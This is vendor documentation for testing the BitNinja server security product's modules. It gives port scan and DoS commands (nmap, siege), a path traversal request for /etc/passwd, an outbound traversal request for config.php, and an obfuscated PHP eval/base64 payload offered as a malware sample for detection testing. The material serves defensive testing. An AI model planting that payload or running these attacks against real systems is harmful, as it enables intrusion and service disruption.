Testing BitNinja

This section helps you to test your bitninja installation and protection.

General considerations

You can watch a webinar recording with George Egri, CEO of BitNinja presenting all these test on our youtube channel here: https://www.youtube.com/bitninjaio

Note

Before you start testing the bitninja protection, please consider these notes about the system:

1. BitNinja is designed not to tolerate testing the protection - as that’s what bad guys do before an attack. There is a specific module AntiFlood responsible for collecting incidents form other modules and blacklisting the IP if there are too many incidents. To bypass this protection you have to disable the AntiFlood module using the following command:

bitninjacli --module=AntiFlood --stop

Note

2. To avoid whitelisting issues the BitNinja cloud doesn’t accept any incidents after a successful IP delist via the CAPTCHA module for 1 minute.

3. BitNinja agent is sending incidenst in batches, not one by one to avoid making things even worse in case of a distributed attack. This may cause lag between raising an incident with a test attack and seeing it on the dashboard.

To run the test attacks we usually use a vagrant ubuntu 16 linux box.

Here is a minimal vagrant file you can use:

Vagrant.configure(2) do |config|
  config.vm.box = "bento/ubuntu-16.04"
  config.vm.provider "virtualbox" do |v|
    v.memory = 2000
    v.cpus = 2
    v.customize ["modifyvm", :id, "--ostype", "Ubuntu_64"]
  end

  config.vm.hostname = "attacker"
end

You can use the https://admin.bitninja.io management interface to see the incidents. Also you can see the logs in /var/log/bitninja. It is important to know that when BitNinja greylists an IP it closes all real services. So if you use your own IP address to simulate the attack and you login via ssh from the same IP, your ssh session will be terminated because the IP has been greylisted.

Test port scan protection

To prepare your server, switch on the Port Honeypot module.

To prepare your attacker machine install nmap first:

apt-get install nmap

Now you can start the portscan to simulate the attack vector.

nmap [IP of your server]

Test DoS protection

The DoS detection module is on by default.

To prepare your attacker machine install the siege package on it.

apt-get install siege

Now you can start the portscan to simulate the attack vector.

siege -c100 http://[your server]

Test the Web Application Firewall

To prepare your server, prepare and switch on the Web Application Firewall module. You can do this test using a simple web browser too.

http://[domain of any sites]/info.php?file=/etc/passwd

It should block the connection. Then, if you use Chrome, it will retry the connection and this time - as your IP has been greyslited - the CAPTCHA page will appear.

Test log analysis

The logdetection module is active by default. To prepare your server for the test you should create a file called plugin_googlemap2_proxy.php or if you have any Joomla sites hosted on your server with this extension, you can use that for testing the log analyzer. Open the URL from a browser several times. It will soon trigger the loganalyzer and greylist the IP.

http://[your domain]/plugin_googlemap2_proxy.php

Testing Malware Detection

To test the Malware Detection module, first you have to enable the module. If you’re using BitNinja version (1.17.1) and up, you have to enable the quarantine option in the module’s config.ini file. Then you can place a malware in the /tmp directory (or in any other enabled directory). The Malware Detection module will immediately quarantine the malware. You can find the quarantined malwares in /var/lib/bitninja/quarantine or on the https://admin.bitninja.io admin panel under the Files menu.

To create a malware for testing purposes, copy and paste the following code into a file in the /tmp directory, and save it.

<?php eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58Vf0Pm71VaUewdkInSIBEKRiIR1UuDvcFkLWxN8m2ttfaXVBG1P9+M3g7L4VltHeEiD2vzzwzOxuulEex4qVHUxQzare3/3dYWYnbEU1m42njKIyi/uDy2pmwQuyzZtvr/fHwd6t7J7QwiawKUAKyC0Hdez6BVGcY/RuOrun5azyMzwfRmN6iTRSfNtSj8J+rMBrHSqN+ejCR6QIsKFgZTLBvU8CDJ4bcFBga/Smadjbl+WHKwfS9KFE8A5QOCuNcptxM4l8a9shQSvOkRcIsIHxnZxrGF4OTEAIMQULp/rdKWzzT/BmrWDCyqbkquQog41x3M0wULOfusiKn/o6PQUFTQEZGM/95pIIgP2UahReDZLjmlDORuTSpZZGk73T45iUyp9uETYboNj10TXHkA7aDFXFhWbnn+y1UwElbxlrRH5KIqzuOABr0NwUBdt9FKxWIW4zUIn7U7qa7K5IeTLx+etkRRrcdmbNjfO0kmSw4jgtBi5aVV/ht/53oa9QfjuPT/sfw8ugiZ+wMpFwbToKV1cng+OoivBzHo8Fg7Nxt1Bc5m2TteIAs4Hsqcor/DEpeOS9kURSvOa6TYZM6d6+u4jfOz96L5nSvnh8wV+aS0AMjWcYPh3nGDNkh0Zx02YFfCw8m6hALdSynEg6XFl9s8JYkMoNh/fnOfsDwkG3LZx498CdY5y4I4wqaHUOXbUNdDAKgxEuh2/N176U5rsAB8EoiDXmkfAGPEG6ZwqNxtkXOvkquw21EPuwbJKTYybiyXex6hplJUm+ELFVsD8kIzklln9bnK05EPYndKtBTqUV3F/Xbju/YTrSqDuoyXktIYucNKhQ3lSoIVzwwYZv6sCa3Rt7In1dkZvMzOcD6x1aaUVWZA5SpnOS4PoDpIe5GwiwHAaWHzxNtLPOcFXZY4IEoysoQsyhsQA3/byhOjgOa5Cnd1FPVJBcrfR2HkjuWSPB+rKT5Ch4+bztn9jexZXWRDZJKmRElRsba7aTMsBZ7WxDW8z9SXJWZcSk5FRm3hfh1/aieuVVGXjRraI1+w2AK/o0apxNfdpPzXR3tTBSX/N5t75FoEHjxkc/a+83fWp6C3+MDJVbGtA4M22OoTjY6OjFYaZuCP1VaOp0NltdpLBJq7dQx2i1bTMdH4LovSoeh07VjTZ8GFTg9S4XdyriGo3incsa5BTt4cQcyl2o8rqPzNFMD91YXk5dk7QZbaonGs3YaML8lFElbL5SGq7Ojs6OPHWALQg6p1zHZsIiqJOFNEwMi7/uAsMf2hoTuk2L24D2iuZn/lnQ4Lpa0U5mn9vJ3Nlyp+Poo/dWO0q79wN7WuPJw/oUnLlOyC66eJh996caW2bxF8xUE2WBLKX4VgvwpDHfaT0NGAIDtiu0lA95jyXW4Zjwf/uB9KnOVb2va7c3ceAGC5/ovCvILqJ1Zk52MOUIC/w8=')))); ?>

Test the Outbound WAF

To test the outbound web application firewall first enable it. To prepare your server create a PHP file with this content:

<?php
$result = file_get_contents('http://example.com/info.php?file=../../../config.php');
var_dump($result);

Save this file as backdoor-test.php and then open it with a browser.

http://[domain]/backdoor-test.php

The $result variable should contain false, because the outbound WAF module intercept the connection, and on the https://admin.bitninja.io admin panel you can list the resulted information under the files menu.